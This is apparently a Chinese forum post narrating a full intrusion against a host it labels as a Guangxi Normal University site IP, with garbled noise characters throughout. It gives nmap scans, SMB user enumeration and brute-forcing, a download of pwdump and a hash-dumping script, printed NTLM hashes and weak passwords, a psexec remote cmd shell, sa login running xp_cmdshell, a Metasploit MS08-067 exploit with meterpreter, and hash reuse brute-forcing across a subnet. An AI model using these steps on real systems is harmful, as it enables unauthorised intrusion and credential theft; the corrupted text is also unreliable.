广西师范网站http://202.103.242.241/3 ^# E2 v- ^: a K
) P% t8 v. O: o: H+ L A, c. i$ Zroot@bt:~# nmap -sS -sV 202.103.242.241
! M( W) \8 P6 j4 m/ c$ {' p5 N( o3 P: i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST7 o: @. P: l" K0 u+ n: f0 D
8 {$ d$ t$ q0 ?# }+ u+ k' hNmap scan report for bogon (202.103.242.241)9 B- q t9 N8 H% {2 y1 H4 C6 V1 K
% L$ S8 B C' G* l/ r; C" w
Host is up (0.00048s latency).
( Y. Y6 d3 j( t0 T C- s: r: z& k* I9 S5 z0 k7 G
Not shown: 993 closed ports& s6 t! F, m5 Q( t% {8 }' f
* v0 K+ l* x% Q( P
PORT STATE SERVICE VERSION) a4 {- z9 Z( l) ]
1 h1 h) {% x# n" c, w4 w135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)/ ]5 Z8 @! ~- Z" P- ^$ W) M
* n g; q: J' ^$ |139/tcp open netbios-ssn
+ ]7 B+ l h& n: }. L: X+ r9 L
% b" S2 Q% w" x445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds0 q) d( Q, R/ L
; V( A$ E7 T( D2 I6 F0 V% N( X% E1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
! _ z' `5 k3 l
9 C4 i) z- x8 L4 o q+ D1026/tcp open msrpc Microsoft Windows RPC
/ m8 o( M& O( M" }" G8 f* H: V5 ^& t1 t$ h [6 ]
3372/tcp open msdtc?
, M* o8 P) E4 t8 h$ P1 U5 l# M( q R( c- l! q+ q, b+ w
3389/tcp open ms-term-serv?: }8 ?7 z. r8 a2 s+ p* V
) F; g- ]5 _7 w% P. |/ y Y
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :$ H$ ?3 v, [3 r! b' J0 H
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r3 Q2 Z- p( J$ R
: }3 R/ a! L& ESF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
6 ]/ p) O; p0 f
/ ?* l" e; y4 i: p, g. a4 VSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)( c$ O/ t% j( v7 e
5 a! j X8 y3 X! n
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
( b, t1 ?5 t6 U2 W0 k, `' @0 z/ C5 N) b7 X. h7 }% E# y( i. m) ^
SF:ptions,6,”hO\n\x000Z”);* A0 \" Y4 k. n) Q
' u" |' f" D {
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)4 C A) r. P8 N/ e* D% K
' k( W4 j& a( P& D) W4 Q
Service Info: OS: Windows' ? _" ?# l. A' [
- C7 a$ B# v9 O2 t* LService detection performed. Please report any incorrect results at http://nmap.org/submit/ .' v% ~$ k2 B6 F) s, x! S! l
7 ]0 i; c6 N9 P$ |0 D
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds" n2 X. e1 v0 e9 E4 J
, E* U- f" u: r7 v" Aroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
# f! J" s" Q& P# @; N
" F" O$ Z3 c& g! }" s, Q2 p-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse5 j5 z; J& q: g# E8 u
/ l( L, {) c' E-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse* n9 n# m# G- U" K/ r
7 z ?; M ?+ O4 M6 \-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
/ j/ T) e6 w8 Z, X
) ]. G9 A0 M& J3 d Z! U3 ]% V" z-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse3 U) ~3 d6 F) n8 L: A B
0 {( e* M4 u9 x. Z$ i
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse5 \0 B) u. C( Z$ R4 k
6 `9 Z! P- t8 s* h9 s p
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
7 U6 p2 B# Y! T* B, A! u+ c- |. l" @, |, K* i0 O
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
6 t' g4 b' f& o9 ? O! ?1 m# t3 d U6 i
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse/ a% p0 K, X' G- ]8 Z
; z9 F1 d( l: B% i0 O9 j-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse8 e3 g3 e/ L) e L2 p
s, |; E& Q A: E. r& d& \-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse5 ^# \4 g- V' u# O8 j. }* @
K; X8 W& K# P7 v4 u1 B; W# R-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
s" f) j4 W6 {8 e# m2 t% ~+ t0 t9 X
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse6 R$ P$ I: ]6 I
5 T, y& n: S8 G0 \$ w9 u9 f-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse) H$ H+ c1 L; | G' v7 X8 E5 K
: @+ v6 D$ g# Q2 T-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
7 f8 U9 |/ U0 Q; ^$ _
! z i3 t( t6 Y) E-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
$ H* Q a0 I5 f8 H' @) o; \' f+ L" q- N
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
( H- Q9 K* k1 k1 O& z% L4 j
: h9 v" l8 t2 D- d* w//此乃使用脚本扫描远程机器所存在的账户名
. j! x" M7 ^! f+ I* i
4 L! ]9 o. T+ R( z0 A" \3 m9 i& Z7 ^Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST! H+ u& C4 b' d7 {1 u% J
* d: ^$ R3 M% x9 c. k/ c: [; SNmap scan report for bogon (202.103.242.241), ^# T5 n, G# l# s+ v# s
! _- b: n: j6 u* xHost is up (0.00038s latency).
, ]4 n, c2 _& I" ?8 G
, {) b% @& z% t8 ~8 y/ RNot shown: 993 closed ports
u4 r9 @9 K$ V/ `9 ?1 w6 {2 ^# ]+ s
PORT STATE SERVICE
4 s# r7 V |& ^* V0 W5 Q$ `# `2 M+ a) n2 n. u: }
135/tcp open msrpc
# G6 j, x2 [" \' q9 D+ O+ t @7 {7 d1 y5 z
139/tcp open netbios-ssn
" I2 c/ g8 U0 {. }7 t x3 p3 K* O% P
445/tcp open microsoft-ds
& ?, T1 b) J9 i! y- p
8 F/ n: ?; {* \$ ]1025/tcp open NFS-or-IIS
8 X9 \) F) Z% f9 ?1 U$ H
* q7 `: {1 I# K, [1026/tcp open LSA-or-nterm3 D% t/ j2 k+ s* Z: L
' z$ b4 \) G3 J- t- w
3372/tcp open msdtc: M0 A- H5 [5 ~, u9 t3 x2 H; g
) u: V/ r) L) J1 i, c$ {# L
3389/tcp open ms-term-serv
+ O. Z$ f/ E6 R$ H# _. |* J3 m# x: G
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 d' |/ |3 V$ a( v% y3 E3 Y2 [
8 e5 f9 A* n2 kHost script results:* B6 D9 b! }0 n/ |) P
( M* _. B* Y1 P+ U7 z& ]| smb-enum-users:
" X1 q( g+ v D6 `5 ?% D, g. d
1 N: u8 E4 \( ^1 j) s|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果' t6 {. a* S) y+ F/ y7 N
# t/ ~) f8 Y. @" a& ]9 fNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
: r6 d3 ~# {3 y1 p7 T$ X5 T a; M9 z8 N. L# u/ }
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
6 \. R" X- E M3 @' @; o: z; H& H( i. u. O# M4 D5 g- F
//查看共享
0 t3 S. \0 T0 ?, y
2 v* \0 F# N% [* q- yStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST6 d9 _! N) u6 g/ r. c
" {) k: v3 U/ s! |9 h
Nmap scan report for bogon (202.103.242.241)' h P2 ]7 k; \' L) A) i
( K" G2 X6 C/ a4 v$ G, QHost is up (0.00035s latency).6 [$ l( Z# F. u/ Z* u
: f* m; J: T! e1 D3 {Not shown: 993 closed ports
, F/ _3 {0 L& Z+ T/ t
8 F) J" }# e* B9 aPORT STATE SERVICE
3 @$ t+ K0 Z2 A2 R; J
9 ^4 {# k) J m: \. ?9 f135/tcp open msrpc
4 l8 i5 W; o! x% A9 M
. |/ L$ _* _9 c139/tcp open netbios-ssn+ D3 E0 Y1 o: Y9 o
) _! J( B! B' ^% S. ]9 k445/tcp open microsoft-ds
( l* n# `) o# a) j3 S! B3 O5 W h0 V! D3 ]7 d2 U* T% r
1025/tcp open NFS-or-IIS
; O! s) P: C$ D; Q- G) ?3 @' e# h ~; A4 V5 t3 s* M
1026/tcp open LSA-or-nterm
2 r9 j2 L3 c& _. ~2 h) f( {% [: X
3372/tcp open msdtc
& @# V' L1 ?) \# `" Q8 d! l- a% I [ I/ G. S+ }/ U# x
3389/tcp open ms-term-serv( G1 N: F$ Z u! N& ?* m) O+ H
. m9 G' s% }( E6 l' W* A5 L
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ U$ `6 C8 U \. r
2 ?+ u! h, o j) W y* ]Host script results:6 y t1 L- [( P f m0 q/ H& H" w( H; K
; D V) |& ]( |! w/ [) W! U| smb-enum-shares:; B# c' n' } D+ |; @
; o: a6 J- }$ I+ K1 Y5 _
| ADMIN$
4 `# N# E( g0 {7 H; s
6 B- ~' [1 W5 A. W' c) {. B7 w% l| Anonymous access: <none>
' Z5 O/ [& ~. }) c9 A5 [
& ^# @; e# h9 g F| C$
- X& O' U1 r) ^8 M
5 b$ ]& N0 [, m8 ]4 w| Anonymous access: <none>$ y7 V: \( P* e) Z( H9 e! C$ D
" T2 s7 M. L2 y: y' P
| IPC$8 E0 c: [: W3 H' L+ f* j- ~
: e$ I" |. {1 v( T
|_ Anonymous access: READ
6 i) O7 B8 u2 u7 w# \ H% Z0 A; {! R; C' N+ T5 A2 o
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
' c& F& A* O6 n3 [8 f
7 B8 ~; s0 A9 U$ {& l6 n, Aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
, d+ l1 w7 n/ c/ W2 c, c
& h" G2 s( Y8 ^" ]//获取用户密码9 o7 V! h8 |* W
# Y2 P; y: E2 G6 j. y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST. C/ f- F' {; X. m/ J( z3 x
" u8 L/ O% m1 BNmap scan report for bogon (202.103.242.2418)
, } ^9 Z1 W. i% P+ r
$ u( ~7 z$ t, u. P3 sHost is up (0.00041s latency).
% K" r1 Z; k; |& f
" M0 U8 T9 }$ e# Q8 r' YNot shown: 993 closed ports
: M. h3 S- A/ \% ^1 _ c8 }* C, [2 }1 U2 b9 p) D/ [$ s
PORT STATE SERVICE& ]8 ^, S# P) s; b( p
4 _* b9 L( ~) r' L* R
135/tcp open msrpc( j3 W7 u" k8 W5 e& L
1 q: n5 s# P9 _$ T- l
139/tcp open netbios-ssn
: K* z7 F8 ^- j9 T# K# N, @9 Y/ O% ?) G$ c* E& h& n
445/tcp open microsoft-ds
4 L9 S- x( a8 E# F2 {! H# @8 L3 ^- N. M" T
1025/tcp open NFS-or-IIS. ]( E$ y* H/ R$ R) L7 O) T
. Z; `( U" C5 U
1026/tcp open LSA-or-nterm7 g S! ~% \7 e# g: A8 k% `. {
( g. y5 y) y! F+ T% g% B+ M
3372/tcp open msdtc
4 R+ g; Q6 \ c0 G K3 q8 C9 Z; c$ i) o/ R& e: w
3389/tcp open ms-term-serv* b6 P! Y( D$ ?; j& S
, [4 Y3 k6 F/ I+ X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) c9 Q' n0 @& t' ?
+ T+ ^( ?( L" l0 uHost script results:
4 K- n3 J- U# k; d( E3 ?: p1 w4 R) K, q3 j6 Y5 D/ D* J
| smb-brute:
# w3 t' U2 S) e
! ?. A1 Y# ? S! nadministrator:<blank> => Login was successful
" J# _: T6 }4 J' m9 I* P
$ D2 s" x; @2 a% H* [. [: W|_ test:123456 => Login was successful4 G/ J% ?6 V- `& ^# }6 h8 o* V
2 Q1 R2 Z, K: H0 q$ R: g* ^) c, s7 A
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
1 k) E1 Y; j) r9 c/ d* Q
/ ]! V4 Y; c4 r* f# p- ]root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
1 i! R, | m+ |1 g4 }* k& D! Q1 _$ q) T
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
. X- ]- F# c$ G% ~
3 Y/ [3 t* r- |7 b7 s/ ^ Mroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse9 U: v# K) I( u$ s8 R t
7 R1 S, X+ I' _ {2 Yroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
! H& R$ B( E( ]6 s }/ Y! C" N+ l6 W& I( ~' \/ F
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST# b9 L* t# s) b% j0 [ L" W: ?5 H
X& J# |* o2 L7 T( T7 B5 G$ J V8 w
Nmap scan report for bogon (202.103.242.241)
' N) B3 `+ v/ [9 X W- O; h% I g& r' B {. s- X* E3 \0 V
Host is up (0.0012s latency).2 S4 {$ P# r; a4 r
; r5 {2 W5 p: R% @- ^' r: u
PORT STATE SERVICE6 G: G: s- J4 y; f' ~
0 ^* z! \+ V/ S, Q
135/tcp open msrpc3 e8 @* I/ q1 u& f! N
( X; o" J" M2 ?1 g
139/tcp open netbios-ssn) o/ z' p; _) b9 Q# H `
! l, ~/ M9 _3 e& ]! `! K4 g0 x6 E445/tcp open microsoft-ds
0 G8 B/ ~1 O# U5 P* c( H
7 }" X1 H% W# `" VMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, o- `& }2 e. N+ x [
' ^. R+ x$ D; d) J- d6 z+ Z/ JHost script results:
) u9 o4 C; ]+ O' i3 N$ K7 h8 C& r' M! R+ y0 @# b
| smb-pwdump:
( ?$ z1 v8 i) ^ ?. G; [* S% r/ l) R- _! ]
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************: K; B4 |: f* t" M: t1 o4 O! @
9 L2 J) W' B O& D" U8 V0 b: L+ w0 E
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
6 u- ~% u0 M# I7 i' C: v4 l
9 _9 V: e( H$ o! r' ^4 L, E1 y/ i| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D43 S9 C9 Y0 p) `4 X9 z2 N% Q2 N
h+ \6 c9 I9 v- l! ~/ a|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2; J9 c0 f9 W2 }9 o x
" J9 i [0 I, V/ G0 T) P
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds- T- I* C3 t2 \! o, B) K; \
" s, T( q9 h4 @$ L
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
- u/ I+ d# d" v, j0 Q3 P, k
* @$ A. O) f; R9 _4 U-p 123456 -e cmd.exe4 C/ C$ I4 z. a& Q B) F* W: F
" |, L) A$ b( t6 N$ V) Y9 ?PsExec v1.55 – Execute processes remotely. q1 G0 k+ q O! C6 r4 a4 }
1 I2 t# j+ b2 n1 X) w
Copyright (C) 2001-2004 Mark Russinovich
2 C. z9 P7 L. x z! l/ U) N/ X/ e2 k7 L8 y& e0 H+ V# ~' u8 a% z
Sysinternals – www.sysinternals.com/ I2 ~- ?# [3 x) ^" ]
2 [9 s9 `7 w$ Z1 { O% b
Microsoft Windows 2000 [Version 5.00.2195]
! _+ g9 M7 E9 z' j5 |' U1 E! q. F: g$ ^, T r
(C) 版权所有 1985-2000 Microsoft Corp.7 V) R% o3 C) ?8 X- q( y
4 Y2 |" H! D& L- d* ^! T$ ]& FC:\WINNT\system32>ipconfig6 u; N4 E# E1 |6 Q$ B3 @' M0 t# p
; B3 |0 H( ~. w" P+ G& T( w' }Windows 2000 IP Configuration
6 Y' M! S. ?; j$ S4 Y
; P1 {: _6 ^2 U9 F0 A! v% XEthernet adapter 本地连接:& D9 o) X4 ~- k
6 g: R9 ]7 z) r5 q( s. ?Connection-specific DNS Suffix . : e/ o& F9 q( H; |8 [4 H' w
' c X. V& P; {' [2 IIP Address. . . . . . . . . . . . : 202.103.242.241" o' n, j/ F4 D
. O9 j8 o7 D; G. {/ H! b7 b; D: RSubnet Mask . . . . . . . . . . . : 255.255.255.02 @/ B' \1 |0 b) K
' E2 b9 v7 b0 A& w3 r+ B
Default Gateway . . . . . . . . . : 202.103.1.1
, ~) \- O6 [0 d& d5 ~1 |- Y/ w! v/ m. k+ u5 @1 ]% G
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
7 i5 p/ u9 u0 T- f
H3 B, v4 e% hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
( r) g9 V& M% [4 |& i- w7 o. J& T% `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
! Y" |4 X5 J# E7 ]: M W( |2 _' `, U, G7 H' M
Nmap scan report for bogon (202.103.242.241)
2 m* ^2 v6 E, p1 ^2 h h, I8 _% _$ T1 p0 J8 P
Host is up (0.00046s latency).
0 J2 K2 W, F: B0 Y9 W& T2 e& W. M( x; A, G% y8 [8 Z3 Y: C1 j
Not shown: 993 closed ports
+ y+ c& h4 c" q) O' B2 w) V3 D2 N# W& E
PORT STATE SERVICE
' }/ u/ B2 [5 x3 j7 W3 |8 ]7 [/ f! B% \
135/tcp open msrpc5 `$ f% c& d0 p' @. C* W4 f
; F7 j: V4 i$ g& g' F9 w$ p
139/tcp open netbios-ssn1 T* S* K7 H, X% n2 Q7 K
$ C' k0 t2 Q. S; S, ` s& k445/tcp open microsoft-ds9 F9 q* b- |& [2 B9 \
) d1 J, L C- [% I* H+ x( l2 W
1025/tcp open NFS-or-IIS6 L0 @, n y& `+ z
- B" E1 I6 `2 y) B* n
1026/tcp open LSA-or-nterm! v0 a$ ^- w) Y0 T D0 |: i/ C: ^: z8 b5 X
8 r0 V+ I: L8 t! t% {7 U v
3372/tcp open msdtc
3 @+ \2 h4 Q+ n z% Z7 R
$ D1 F0 j, J1 F- P: [* r3389/tcp open ms-term-serv
3 m- h0 ^7 m: V5 Q6 J0 n \& ]8 o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. I- t8 d" R* y* p7 b* D, N
# [) p7 L7 A, s2 j. HHost script results:( S) M0 a; _1 a% v; A
& T" D! ^, X; o, k" K
| smb-check-vulns:* Y5 v8 W- B1 Q0 V; j
6 N) D( N3 F% Q) N! p! t, n$ n% `4 T" O
|_ MS08-067: VULNERABLE
* w @- ~8 z; R* v- k; A J, w8 R" V/ a% ^* `
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds8 Q. j2 C+ V$ l ?( M
4 d# Y, @+ }3 u8 N) i
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
6 m# A) l1 j2 h1 S! ~$ K, x7 ~$ p5 r7 p% A
msf > search ms08/ P }) D+ Y2 ]! S6 @ V. j
- B* z# N6 l3 z, \msf > use exploit/windows/smb/ms08_067_netapi
. x& x2 Z3 t9 R2 y: E$ D. H. U1 |) K1 ]# |
msf exploit(ms08_067_netapi) > show options1 o) {& P. G$ c, j4 o1 a
, v/ c0 m! t& E1 _* umsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
2 Y* p/ u7 q a7 K$ @) j; T' X0 j) I& G6 d/ t# G, T# G
msf exploit(ms08_067_netapi) > show payloads7 j ^- ]" J& v2 x( {" O
& v- |0 ?' M0 o# f& ~! G: ]
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp6 J# B- Y( ^; m' y& i* K; r2 K
) b7 o( W9 l1 T* z% lmsf exploit(ms08_067_netapi) > exploit, J0 B6 D2 J+ Q- F+ W& a& d
" p; s+ n7 X" }3 p7 smeterpreter >) ^5 Y; _5 f& n0 l0 O2 q; @7 t
& y1 _( S4 l4 B& }/ @9 c* ^: e% R8 vBackground session 2? [y/N] (ctrl+z)
$ n6 N4 {! Q4 j5 [5 v6 y6 z0 @, i
3 T- d! K5 K7 H( G' m0 \msf exploit(ms08_067_netapi) > sessions -l+ C, D3 w+ w% T0 O: r
5 E6 S1 I8 P2 Kroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt+ ]$ n7 q) |5 o& q" I
6 s% j# e' q% K
test. R% m$ t! N5 t- Q. E
}5 v. B0 r4 W' `0 Padministrator7 b# k. S4 s* f* S( \. B
1 k$ ]- N( p: X( P# H) Wroot@bt:/usr/local/share/nmap/scripts# vim password.txt [* p! K/ t4 Y
8 W8 ]7 Q- G7 [4 t/ S9 h0 h* U, t
44EFCE164AB921CAAAD3B435B51404EE& D: w3 V! A7 Q0 T* @
' o+ W# }8 x7 C
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
0 H8 o- ^7 M, {& @- J( {9 z& Q
$ ]4 R# ^$ B) a7 D0 j: s //利用用户名跟获取的hash尝试对整段内网进行登录. x1 @; s) k$ k% i8 ?
5 }. P7 `! z7 U3 Z( k6 t+ P7 z3 e* |
Nmap scan report for 192.168.1.105
" W8 E/ g5 O5 m5 N5 B( u) P* Z0 N' I! |# V" L* e
Host is up (0.00088s latency).
K2 n+ @, x( ?3 O: L1 ]" w2 @: `# \
Not shown: 993 closed ports
! K6 j# v1 ]( I: ^8 ^
2 I% ~' O+ C& {- v0 l5 RPORT STATE SERVICE
: X- z* w' O( L, \, C9 \8 c, M
1 P. U1 g0 h1 q) t135/tcp open msrpc- k- H% A- m5 O
5 ? o# ]; ?1 v; j. Z139/tcp open netbios-ssn
( v4 j& f& | C. i* l0 v4 v& ^
( v+ o; g7 Q2 G! w& x445/tcp open microsoft-ds
" f7 P9 n g8 J0 d B( ], k. j2 E; ?1 b7 d" O, C
1025/tcp open NFS-or-IIS4 L& l1 I, z- L, j0 Z W
9 ^1 q/ s6 G3 g1026/tcp open LSA-or-nterm
9 N: u) Y/ Y5 C! h, N" V; Y7 e6 U, O2 ~: [9 N% e0 m# i# T
3372/tcp open msdtc% s; s. G6 U. t* O h) \
; J+ V+ o/ ]" ~, \3389/tcp open ms-term-serv
- b m* N) m, M7 a8 U) }; i4 |* P: {
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) m5 t" B+ S h+ u0 ] K
3 F, P! u# X8 Q& C% H+ P; lHost script results:6 O) B0 C+ L+ P0 |( {
, C" h* A" ~0 h. |" o1 |
| smb-brute:
& Z! t' g3 N+ [/ b8 ^. C# P! ?
# w8 O3 \: X; D|_ administrator:<blank> => Login was successful
' p9 G8 i+ v C3 p6 Z4 u. e
* P7 u3 E7 c1 [5 L( _9 ^攻击成功,一个简单的msf+nmap攻击~~·: ?9 }. S! _- u8 I/ S5 Z$ i3 d* i
, a1 `6 a; ?% G3 a- O9 V2 L4 J
|
发表于 2012-12-4 12:46:42
收藏
支持
反对